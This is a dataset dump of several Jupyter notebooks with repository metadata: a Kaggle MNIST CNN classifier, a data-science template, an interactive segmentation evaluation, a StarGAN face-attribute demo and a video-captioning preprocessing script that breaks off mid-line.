[ [ [ "<a href=\"https://colab.research.google.com/github/komalaftab/kaggle_Competitions/blob/master/digit_recognizer.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "**Objective**", "_____no_output_____" ], [ "**Learn computer vision fundamentals with the famous MNIST data**", "_____no_output_____" ], [ "**importing libraries**", "_____no_output_____" ], [ "\n\n1. data load\n2. data preparation\n* Normalization\n* reshape\n* label encoding\n* spliting training and validation \n3. introduction to convents\n4. saving submission file\n\n\n\n\n\n\n\n\n\n", "_____no_output_____" ] ], [ [ "import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport seaborn as sns\nnp.random.seed(2)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nimport itertools\n\nfrom keras.utils.np_utils import to_categorical # convert to one-hot-encoding\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\nfrom keras.optimizers import RMSprop\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ReduceLROnPlateau\n", "Using TensorFlow backend.\n" ] ], [ [ "**load_Data**", "_____no_output_____" ] ], [ [ "# loading data \ntrain_data = pd.read_csv(\"train.csv\")\ntest_data = pd.read_csv(\"test.csv\")\n", "_____no_output_____" ], [ "# display first five rows of train_data\ntrain_data.head()", "_____no_output_____" ], [ "test_data.head()", "_____no_output_____" ], [ "# checking shape of train_data\ntrain_data.shape # \n", "_____no_output_____" ], [ "# checking shape of test_data\n\ntest_data.shape", "_____no_output_____" ] ], [ [ "**Check for null and missing values**", "_____no_output_____" ] ], [ [ "# check the data\ntrain_data.describe()", "_____no_output_____" ], [ "# check missing and null values\ntest_data.isnull().sum()", 
"_____no_output_____" ], [ "train_data.isnull().sum()", "_____no_output_____" ], [ "Y_train = train_data[\"label\"]\n\n# Drop 'label' column\nX_train = train_data.drop(labels = [\"label\"],axis = 1) \n\n# free some space\ndel train_data \n\ng = sns.countplot(Y_train)\n\nY_train.value_counts()", "_____no_output_____" ] ], [ [ "There is no missing values in the train and test dataset. So we can safely go ahead.", "_____no_output_____" ], [ "**Normalization**", "_____no_output_____" ], [ "We perform a grayscale normalization to reduce the effect of illumination's differences.\n\nMoreover the CNN converg faster on [0..1] data than on [0..255].", "_____no_output_____" ] ], [ [ "# Normalize the data\nX_train= X_train / 255.0\ntest_data= test_data / 255.0", "_____no_output_____" ] ], [ [ "**Reshape**", "_____no_output_____" ] ], [ [ "# Reshape image in 3 dimensions (height = 28px, width = 28px , channel = 1)\nX_train = X_train.values.reshape((-1,28,28,1))\ntest_data = test_data.values.reshape((-1,28,28,1))", "_____no_output_____" ], [ "test_data.shape", "_____no_output_____" ] ], [ [ "**label_encoding**", "_____no_output_____" ] ], [ [ "# Encode labels to one hot vectors (ex : 2 -> [0,0,1,0,0,0,0,0,0,0])\nY_train = to_categorical(Y_train, num_classes = 10)\n", "_____no_output_____" ] ], [ [ "**Split training and valdiation set**", "_____no_output_____" ] ], [ [ "# Set the random seed\nrandom_seed = 2", "_____no_output_____" ], [ "# Split the train and the validation set for the fitting\nX_train, X_val, Y_train, Y_val = train_test_split(X_train, Y_train, test_size = 0.1, random_state=random_seed)", "_____no_output_____" ] ], [ [ " i choosed to split the train set in two parts : a small fraction (10%) became the validation set which the model is evaluated and the rest (90%) is used to train the model.", "_____no_output_____" ] ], [ [ "# Some examples\nimport matplotlib.pyplot as plt\n\nh = plt.imshow(X_train[0][:,:,0])", "_____no_output_____" ], [ "k = 
plt.imshow(X_train[10][:,:,0])", "_____no_output_____" ] ], [ [ "**Introduction to convnets**", "_____no_output_____" ] ], [ [ "from tensorflow.keras import layers\nfrom tensorflow.keras import models\n\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))", "_____no_output_____" ] ], [ [ "Let’s display the architecture of the convnet so far.", "_____no_output_____" ] ], [ [ "model.summary()", "Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d (Conv2D) (None, 26, 26, 32) 320 \n_________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 13, 13, 32) 0 \n_________________________________________________________________\nconv2d_1 (Conv2D) (None, 11, 11, 64) 18496 \n_________________________________________________________________\nmax_pooling2d_1 (MaxPooling2 (None, 5, 5, 64) 0 \n_________________________________________________________________\nconv2d_2 (Conv2D) (None, 3, 3, 64) 36928 \n=================================================================\nTotal params: 55,744\nTrainable params: 55,744\nNon-trainable params: 0\n_________________________________________________________________\n" ] ], [ [ "**Adding a classifier on top of the convnet**", "_____no_output_____" ] ], [ [ "model.add(layers.Flatten())\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(10, activation='softmax'))", "_____no_output_____" ] ], [ [ "We’ll do 10-way classification, using a final layer with 10 outputs and a softmax activation.\nHere’s what the network looks like now", "_____no_output_____" ] ], [ [ "model.summary()", "Model: 
\"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d (Conv2D) (None, 26, 26, 32) 320 \n_________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 13, 13, 32) 0 \n_________________________________________________________________\nconv2d_1 (Conv2D) (None, 11, 11, 64) 18496 \n_________________________________________________________________\nmax_pooling2d_1 (MaxPooling2 (None, 5, 5, 64) 0 \n_________________________________________________________________\nconv2d_2 (Conv2D) (None, 3, 3, 64) 36928 \n_________________________________________________________________\nflatten (Flatten) (None, 576) 0 \n_________________________________________________________________\ndense (Dense) (None, 64) 36928 \n_________________________________________________________________\ndense_1 (Dense) (None, 10) 650 \n=================================================================\nTotal params: 93,322\nTrainable params: 93,322\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "# Define the optimizer\n#optimizer = rmsprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)", "_____no_output_____" ], [ "learning_rate_reduction = ReduceLROnPlateau(monitor='val_acc', \n patience=3, \n verbose=1, \n factor=0.5, \n min_lr=0.00001)", "_____no_output_____" ], [ "model.compile(optimizer='rmsprop',loss='categorical_crossentropy',metrics=['accuracy'])\nmodel.fit(X_train, Y_train, epochs=30, batch_size=40)", "Train on 37800 samples\nEpoch 1/30\n37800/37800 [==============================] - 35s 925us/sample - loss: 0.1917 - accuracy: 0.9388\nEpoch 2/30\n37800/37800 [==============================] - 34s 911us/sample - loss: 0.0513 - accuracy: 0.9834\nEpoch 3/30\n37800/37800 [==============================] - 34s 910us/sample - loss: 0.0363 - accuracy: 0.9887\nEpoch 
4/30\n37800/37800 [==============================] - 34s 912us/sample - loss: 0.0268 - accuracy: 0.9913\nEpoch 5/30\n37800/37800 [==============================] - 34s 909us/sample - loss: 0.0211 - accuracy: 0.9933\nEpoch 6/30\n37800/37800 [==============================] - 35s 914us/sample - loss: 0.0174 - accuracy: 0.9950\nEpoch 7/30\n37800/37800 [==============================] - 34s 908us/sample - loss: 0.0142 - accuracy: 0.9959\nEpoch 8/30\n37800/37800 [==============================] - 34s 909us/sample - loss: 0.0118 - accuracy: 0.9964\nEpoch 9/30\n37800/37800 [==============================] - 34s 911us/sample - loss: 0.0103 - accuracy: 0.9974\nEpoch 10/30\n37800/37800 [==============================] - 34s 909us/sample - loss: 0.0089 - accuracy: 0.9977\nEpoch 11/30\n37800/37800 [==============================] - 34s 911us/sample - loss: 0.0087 - accuracy: 0.9976\nEpoch 12/30\n37800/37800 [==============================] - 34s 910us/sample - loss: 0.0079 - accuracy: 0.9976\nEpoch 13/30\n37800/37800 [==============================] - 34s 901us/sample - loss: 0.0064 - accuracy: 0.9984\nEpoch 14/30\n37800/37800 [==============================] - 34s 906us/sample - loss: 0.0050 - accuracy: 0.9986\nEpoch 15/30\n37800/37800 [==============================] - 35s 913us/sample - loss: 0.0041 - accuracy: 0.9989\nEpoch 16/30\n37800/37800 [==============================] - 34s 902us/sample - loss: 0.0055 - accuracy: 0.9986\nEpoch 17/30\n37800/37800 [==============================] - 34s 911us/sample - loss: 0.0049 - accuracy: 0.9986\nEpoch 18/30\n37800/37800 [==============================] - 34s 903us/sample - loss: 0.0039 - accuracy: 0.9990\nEpoch 19/30\n37800/37800 [==============================] - 34s 907us/sample - loss: 0.0042 - accuracy: 0.9990\nEpoch 20/30\n37800/37800 [==============================] - 35s 925us/sample - loss: 0.0027 - accuracy: 0.9990\nEpoch 21/30\n37800/37800 [==============================] - 34s 908us/sample - loss: 0.0034 - accuracy: 
0.9990\nEpoch 22/30\n37800/37800 [==============================] - 34s 902us/sample - loss: 0.0044 - accuracy: 0.9990\nEpoch 23/30\n37800/37800 [==============================] - 34s 899us/sample - loss: 0.0039 - accuracy: 0.9991\nEpoch 24/30\n37800/37800 [==============================] - 34s 909us/sample - loss: 0.0024 - accuracy: 0.9994\nEpoch 25/30\n37800/37800 [==============================] - 34s 897us/sample - loss: 0.0027 - accuracy: 0.9992\nEpoch 26/30\n37800/37800 [==============================] - 34s 902us/sample - loss: 0.0039 - accuracy: 0.9993\nEpoch 27/30\n37800/37800 [==============================] - 34s 896us/sample - loss: 0.0021 - accuracy: 0.9996\nEpoch 28/30\n37800/37800 [==============================] - 34s 902us/sample - loss: 0.0035 - accuracy: 0.9995\nEpoch 29/30\n37800/37800 [==============================] - 34s 894us/sample - loss: 0.0032 - accuracy: 0.9993\nEpoch 30/30\n37800/37800 [==============================] - 34s 897us/sample - loss: 0.0025 - accuracy: 0.9996\n" ] ], [ [ "Let’s evaluate the model on the test data.", "_____no_output_____" ] ], [ [ "test_loss, test_acc = model.evaluate(X_val, Y_val)\ntest_acc", "4200/4200 [==============================] - 2s 363us/sample - loss: 0.1192 - accuracy: 0.9902\n" ], [ "results = model.predict(test_data)\n\n# select the indix with the maximum probability\nresults = np.argmax(results,axis = 1)\n\nresults = pd.Series(results,name=\"Label\")", "_____no_output_____" ] ], [ [ "**submission file**", "_____no_output_____" ] ], [ [ "submission = pd.concat([pd.Series(range(1,28001),name = \"ImageId\"),results],axis = 1)\n\nsubmission.to_csv(\"cnn_mnist_submission5.csv\",index=False)", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
e72e629f6859961076c6bba613bfd2058a1438ab
8,739
ipynb
Jupyter Notebook
ds/practice/frameworks/ds_ml_template.ipynb
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
null
null
null
ds/practice/frameworks/ds_ml_template.ipynb
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
8
2020-03-24T17:47:23.000Z
2022-03-12T00:33:21.000Z
ds/practice/frameworks/ds_ml_template.ipynb
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
null
null
null
19.164474
91
0.507152
[ [ [ "# Data Science Template\n\nBy Tobias Reaper", "_____no_output_____" ], [ "---\n\n## Contents\n\n", "_____no_output_____" ], [ "---\n\n## Description\n", "_____no_output_____" ], [ "---\n\n## Introduction\n\n### Business Question\n\n#### How does this help the business?\n\n### Solution Overview\n\n- Assumptions:\n- Supervised model\n- Type of classification / regression / etc.\n\n#### Process\n\n- Data processing and exploration\n - Target engineering\n - Explore the data: types, ranges, distributions, outliers\n - Feature relationships\n- Evaluate models\n - Split data into train and test\n - Choose evaluation metric\n - Start with a baseline model\n - Tune hyperparameters and conduct feature engineering to increase predictive power", "_____no_output_____" ], [ "---\n\n## Data and Libraries Setup", "_____no_output_____" ], [ "### Imports and Configuration", "_____no_output_____" ] ], [ [ "# Basic imports\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# ML / sklearn imports\nfrom sklearn.model_selection import train_test_split, RandomizedSearchCV\nfrom sklearn.ensemble import RandomForestClassifier", "_____no_output_____" ], [ "# Configuration\npd.options.display.max_columns = None\n# Suppress scientific notation\npd.options.display.float_format = '{:.2f}'.format\nseed = 92 # Set a random seed", "_____no_output_____" ] ], [ [ "### Data import and overview\n\n- Preview of columns\n- Drop unneeded columns\n- Deal with null values\n- What are the data types and do any need to be fixed?", "_____no_output_____" ] ], [ [ "# Import ____\ndf = pd.read_csv()\ndf.head()", "_____no_output_____" ], [ "# Basic shape of data\ndf.shape", "_____no_output_____" ], [ "# Take a look at data types\ndf.dtypes", "_____no_output_____" ] ], [ [ "---\n\n## Data Exploration and Preprocessing", "_____no_output_____" ], [ "### Data types", "_____no_output_____" ] ], [ [ "# Convert dates to datetimes", "_____no_output_____" ] ], [ [ 
"### Target engineering", "_____no_output_____" ], [ "### Data exploration", "_____no_output_____" ], [ "---\n\n## Modeling\n\n- Split into train and test\n- Choose evaluation metric\n- Baseline model\n- Iterate\n - Feature engineering\n - Hyperparameter tuning\n- Validate", "_____no_output_____" ], [ "### Split data into train and test", "_____no_output_____" ], [ "### Baseline model pipeline", "_____no_output_____" ], [ "### Feature engineering", "_____no_output_____" ], [ "### Hyperparameter tuning", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e72e6f332e864e60c13f63e474fe42d3e6594e29
5,366
ipynb
Jupyter Notebook
notebooks/test_any_model.ipynb
aagaard/ritm_interactive_segmentation
c68b45a54e99eb5401f50e62f7e43a11e34964ee
[ "MIT" ]
278
2021-02-13T11:23:35.000Z
2022-03-31T03:03:50.000Z
notebooks/test_any_model.ipynb
18724799167/ritm_interactive_segmentation
d54a43ff6d987e0ca369c47f9be296337ba530f8
[ "MIT" ]
17
2021-02-21T02:28:38.000Z
2022-03-15T12:19:45.000Z
notebooks/test_any_model.ipynb
18724799167/ritm_interactive_segmentation
d54a43ff6d987e0ca369c47f9be296337ba530f8
[ "MIT" ]
63
2021-02-18T06:08:46.000Z
2022-03-28T06:57:43.000Z
26.83
106
0.543422
[ [ [ "%matplotlib inline\nimport matplotlib.pyplot as plt\n\nimport sys\nimport numpy as np\nimport torch\n\nsys.path.insert(0, '..')\nfrom isegm.utils import vis, exp\n\nfrom isegm.inference import utils\nfrom isegm.inference.evaluation import evaluate_dataset, evaluate_sample\n\ndevice = torch.device('cuda:0')\ncfg = exp.load_config_file('../config.yml', return_edict=True)", "_____no_output_____" ] ], [ [ "### Init dataset", "_____no_output_____" ] ], [ [ "# Possible choices: 'GrabCut', 'Berkeley', 'DAVIS', 'COCO_MVal', 'SBD'\nDATASET = 'GrabCut'\ndataset = utils.get_dataset(DATASET, cfg)", "_____no_output_____" ] ], [ [ "### Init model", "_____no_output_____" ] ], [ [ "from isegm.inference.predictors import get_predictor\n\nEVAL_MAX_CLICKS = 20\nMODEL_THRESH = 0.49\n\ncheckpoint_path = utils.find_checkpoint(cfg.INTERACTIVE_MODELS_PATH, 'coco_lvis_h18s_itermask')\nmodel = utils.load_is_model(checkpoint_path, device)\n\n# Possible choices: 'NoBRS', 'f-BRS-A', 'f-BRS-B', 'f-BRS-C', 'RGB-BRS', 'DistMap-BRS'\nbrs_mode = 'f-BRS-B'\npredictor = get_predictor(model, brs_mode, device, prob_thresh=MODEL_THRESH)", "_____no_output_____" ] ], [ [ "### Dataset evaluation", "_____no_output_____" ] ], [ [ "TARGET_IOU = 0.9\n\nall_ious, elapsed_time = evaluate_dataset(dataset, predictor, pred_thr=MODEL_THRESH, \n max_iou_thr=TARGET_IOU, max_clicks=EVAL_MAX_CLICKS)\nmean_spc, mean_spi = utils.get_time_metrics(all_ious, elapsed_time)\nnoc_list, over_max_list = utils.compute_noc_metric(all_ious,\n iou_thrs=[0.8, 0.85, 0.9],\n max_clicks=EVAL_MAX_CLICKS)\n\nheader, table_row = utils.get_results_table(noc_list, over_max_list, brs_mode, DATASET,\n mean_spc, elapsed_time, EVAL_MAX_CLICKS)\nprint(header)\nprint(table_row)", "_____no_output_____" ] ], [ [ "### Single sample eval", "_____no_output_____" ] ], [ [ "sample_id = 12\nTARGET_IOU = 0.95\n\nsample = dataset.get_sample(sample_id)\ngt_mask = sample.gt_mask\n\nclicks_list, ious_arr, pred = evaluate_sample(sample.image, gt_mask, 
predictor, \n pred_thr=MODEL_THRESH, \n max_iou_thr=TARGET_IOU, max_clicks=EVAL_MAX_CLICKS)\n\npred_mask = pred > MODEL_THRESH\ndraw = vis.draw_with_blend_and_clicks(sample.image, mask=pred_mask, clicks_list=clicks_list)\ndraw = np.concatenate((draw,\n 255 * pred_mask[:, :, np.newaxis].repeat(3, axis=2),\n 255 * (gt_mask > 0)[:, :, np.newaxis].repeat(3, axis=2)\n), axis=1)\n\nprint(ious_arr)\n\nplt.figure(figsize=(20, 30))\nplt.imshow(draw)\nplt.show()", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72e79e4a8a6ef7b83e1384d3efc9c28c1342c97
5,618
ipynb
Jupyter Notebook
05_validate.ipynb
sso0090/garden2
4ecfe4b679cd17e3c9f9536cd48c8baebfb2cd5f
[ "Apache-2.0" ]
null
null
null
05_validate.ipynb
sso0090/garden2
4ecfe4b679cd17e3c9f9536cd48c8baebfb2cd5f
[ "Apache-2.0" ]
2
2021-09-28T01:20:50.000Z
2022-02-26T06:55:14.000Z
05_validate.ipynb
sso0090/garden2
4ecfe4b679cd17e3c9f9536cd48c8baebfb2cd5f
[ "Apache-2.0" ]
null
null
null
29.724868
1,054
0.579566
[ [ [ "## Exploring the data", "_____no_output_____" ], [ "So let's learn how we set up the data. ", "_____no_output_____" ] ], [ [ "#default_exp validate", "_____no_output_____" ], [ "#hide\nimport os, sys, warnings", "_____no_output_____" ], [ "#hide\nroot = \"D:/data_sets/24_garden\"\n#os.chdir(root)", "_____no_output_____" ], [ "#hide\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning) \nwarnings.filterwarnings(\"ignore\", category=UserWarning) ", "_____no_output_____" ], [ "#export\nfrom fastai2.vision.all import *\n#from garden2.utils import *\nfrom garden2.train import *", "_____no_output_____" ], [ "preds1, targs1 = learn1.get_preds()", "_____no_output_____" ], [ "from garden2._nbdev import index", "_____no_output_____" ], [ "index.values()", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72e819187c1ba5916af5400cd470c8731775bf1
210,999
ipynb
Jupyter Notebook
StarGAN.ipynb
AZdet/summer_camp_GAN
45e7d3935e77bef24bb0c8ca90aee250a2a8950d
[ "MIT" ]
null
null
null
StarGAN.ipynb
AZdet/summer_camp_GAN
45e7d3935e77bef24bb0c8ca90aee250a2a8950d
[ "MIT" ]
null
null
null
StarGAN.ipynb
AZdet/summer_camp_GAN
45e7d3935e77bef24bb0c8ca90aee250a2a8950d
[ "MIT" ]
null
null
null
1,327.037736
111,294
0.951583
[ [ [ "# StarGAN\nGAN can not only generate fake realistic images, it can also generate fake images according to desired properties. StarGAN is able to ranslate an input image to any desired target domain. Given a source image and a few attributes we want(so called target domain) for the resulting image, StarGAN can generate desired realistic fake images.\n\n![title](images/intro.jpg)\n", "_____no_output_____" ] ], [ [ "%matplotlib inline\nimport os\nimport numpy as np\nfrom solver import Solver\nfrom data_loader import get_loader\nfrom torch.backends import cudnn\nimport torch\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms as T\nfrom torchvision.utils import save_image\nfrom PIL import Image\nfrom default_config import config\nfrom detect_face import detect_face", "_____no_output_____" ], [ "def build_target():\n while True:\n try:\n print('')\n # 'Black_Hair', 'Blond_Hair', 'Brown_Hair', 'Male', 'Young'\n hair = input('Choose your desired hair color: 0 for Black_Hair, 1 for Blond_Hair, 2 for Brown_Hair ')\n hair = int(hair)\n assert hair in [0, 1, 2]\n male = input('Choose the gender you desired: 0 for Female, 1 for Male')\n male = int(male)\n assert male in [0, 1]\n age = input('Choose whether to generate aged, 0 for No, 1 for Yes: ')\n age = int(age)\n assert age in [0, 1]\n target = [0, 0, 0]\n target[hair] = 1\n target.append(male)\n target.append(1 - age)\n return target\n except Exception:\n pass\n \ndef showimage(img):\n npimg = img.numpy().squeeze()\n plt.imshow(np.transpose(npimg, (1,2,0)), interpolation='nearest')\n\ndef generate_face(face):\n if face is not None:\n new_face = Image.fromarray(face)\n new_face = transform(new_face)\n new_face = torch.unsqueeze(new_face, 0) #(1,3,256,256)\n\n # 'Black_Hair', 'Blond_Hair', 'Brown_Hair', 'Male', 'Young'\n new_face = new_face.to(solver.device)\n target_cls = torch.tensor(build_target()).float()\n target_cls = torch.unsqueeze(target_cls, 0)\n target_cls = target_cls.to(solver.device)\n 
gen_face = solver.G(new_face, target_cls)\n gen_face = solver.denorm(gen_face.detach().cpu())\n showimage(gen_face)\n\n else:\n print(\"No face detected!\")", "_____no_output_____" ] ], [ [ "### Load model", "_____no_output_____" ] ], [ [ "# set config\nconfig.mode = 'test'\nconfig.dataset = 'CelebA'\nconfig.image_size = 256\nconfig.c_dim = 5\nconfig.selected_attrs = ['Black_Hair', 'Blond_Hair', 'Brown_Hair', 'Male', 'Young']\nconfig.model_save_dir = 'stargan_celeba_256/models'\nconfig.result_dir = 'stargan_celeba_256/results'\n\n# solver\nsolver = Solver(None, None, config)\nsolver.restore_model(solver.test_iters)\ntransform = []\ntransform.append(T.Resize(config.image_size))\ntransform.append(T.ToTensor())\ntransform.append(T.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)))\ntransform = T.Compose(transform)", "/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:455: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:456: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:457: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:458: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood 
as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:459: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:462: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n" ] ], [ [ "### Load image and transfer", "_____no_output_____" ] ], [ [ "face = detect_face('./images/02.jpg')\nplt.imshow(face)\nplt.show()", "_____no_output_____" ], [ "generate_face(face)", "\nChoose your desired hair color: 0 for Black_Hair, 1 for Blond_Hair, 2 for Brown_Hair 1\nChoose the gender you desired: 0 for Female, 1 for Male1\nChoose whether to generate aged, 0 for No, 1 for Yes: 0\n" ] ], [ [ "# ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ] ]
e72e836a99d2db0d3b045b20daa85603f273d1e3
114,157
ipynb
Jupyter Notebook
Model-Train-Test-2D-Attention.ipynb
Curious-Geek/Video-Captioning
93a1af5a28ea4e972398f5df63977270c5f52c43
[ "MIT" ]
9
2020-05-03T04:30:26.000Z
2022-03-08T02:09:52.000Z
Model-Train-Test-2D-Attention.ipynb
Chandra-S-Narain-Kappera/Video-Captioning
93a1af5a28ea4e972398f5df63977270c5f52c43
[ "MIT" ]
null
null
null
Model-Train-Test-2D-Attention.ipynb
Chandra-S-Narain-Kappera/Video-Captioning
93a1af5a28ea4e972398f5df63977270c5f52c43
[ "MIT" ]
3
2018-11-01T13:19:50.000Z
2019-07-31T16:37:26.000Z
49.828459
458
0.444248
[ [ [ "# Code to train and test", "_____no_output_____" ], [ "### Write the captions from json file:", "_____no_output_____" ] ], [ [ "import json\nimport os, os.path\nimport pickle\n\ntrain_val = json.load(open('videodatainfo_2017.json', 'r'))\n\n\n# combine all images and annotations together\nsentences = train_val['sentences']\n\n# for efficiency lets group annotations by video\nitoa = {}\nfor s in sentences:\n videoid_buf = s['video_id']\n videoid = int(videoid_buf[5:])\n if not videoid in itoa: itoa[videoid] = []\n itoa[videoid].append(s)\n \noutput = open('./DATA/word_features/captions.pkl', 'wb')\npickle.dump(itoa, output)\noutput.close()\n", "_____no_output_____" ] ], [ [ "### Auxilary functions to handle captions", "_____no_output_____" ] ], [ [ "import numpy as np\n\n\"\"\"Functions to do the following:\n * Create vocabulary\n * Create dictionary mapping from word to word_id\n * Map words in captions to word_ids\"\"\"\n\ndef build_vocab(word_count_thresh):\n \"\"\"Function to create vocabulary based on word count threshold.\n Input:\n word_count_thresh: Threshold to choose words to include to the vocabulary\n Output:\n vocabulary: Set of words in the vocabulary\"\"\"\n \n pkl_file = open('./DATA/word_features/captions.pkl', 'rb')\n sentences = pickle.load(pkl_file)\n pkl_file.close()\n\n unk_required = False\n all_captions = []\n word_counts = {}\n for vid in sentences.keys():\n for cid in range(0,20):\n caption = sentences[vid][cid]['caption']\n caption = '<BOS> ' + caption + ' <EOS>'\n all_captions.append(caption)\n for word in caption.split(' '):\n if word in word_counts.keys():\n word_counts[word] += 1\n else:\n word_counts[word] = 1\n for word in word_counts.keys():\n if word_counts[word] < word_count_thresh:\n word_counts.pop(word)\n unk_required = True\n return word_counts,unk_required\n\ndef word_to_word_ids(word_counts,unk_required, vocab_size):\n \"\"\"Function to map individual words to their id's.\n Input:\n word_counts: Dictionary with words 
mapped to their counts\n Output:\n word_to_id: Dictionary with words mapped to their id's. \n \"\"\"\n\n count = 0\n word_to_id = {}\n id_to_word = {}\n\n # Taking the most frequent vocab_size words\n words = [word for word in word_counts.keys()]\n values = [word_counts[word] for word in words]\n sorted_indices = np.argsort(values)\n words = np.array(words)\n most_freq_words = words[sorted_indices[::-1][0:vocab_size]]\n \n id_to_word = [most_freq_words[i] for i in range(most_freq_words.shape[0])] \n \n #word2idx\n word_to_id = {}\n for i in range(len(id_to_word)):\n word_to_id[id_to_word[i]] = i\n \n print(word_to_id['<EOS>'])\n index = word_to_id['<EOS>']\n word = id_to_word[0]\n print(index,word)\n \n word_to_id['<EOS>'] = 0\n id_to_word[0] = '<EOS>'\n word_to_id[word] = index\n id_to_word[index] = word\n \n return word_to_id,id_to_word\n\ndef convert_caption(caption,word_to_id,max_caption_length):\n \"\"\"Function to map each word in a caption to it's respective id and to retrieve caption masks\n Input:\n caption: Caption to convert to word_to_word_ids\n word_to_id: Dictionary mapping words to their respective id's\n max_caption_length: Maximum number of words allowed in a caption\n Output:\n caps: Captions with words mapped to word id's\n cap_masks: Caption masks with 1's at positions of words and 0's at pad locations\"\"\"\n caps,cap_masks = [],[]\n if type(caption) == 'str':\n caption = [caption] # if single caption, make it a list of captions of length one\n for cap in caption:\n cap = '<BOS> '+cap+' <EOS>'\n nWords = cap.count(' ') + 1\n if nWords >= max_caption_length:\n carr = cap.split(' ')\n carr = carr[0:(max_caption_length-2)]\n cap = ' '.join(carr)\n cap = cap + ' <EOS>'\n nWords = cap.count(' ')+1\n cap = cap + ' <EOS>'*(max_caption_length-nWords)\n cap_masks.append([1.0]*nWords + [0.0]*(max_caption_length-nWords))\n curr_cap = []\n for word in cap.split(' '):\n #print(word)\n if word in word_to_id.keys():\n curr_cap.append(word_to_id[word]) # word 
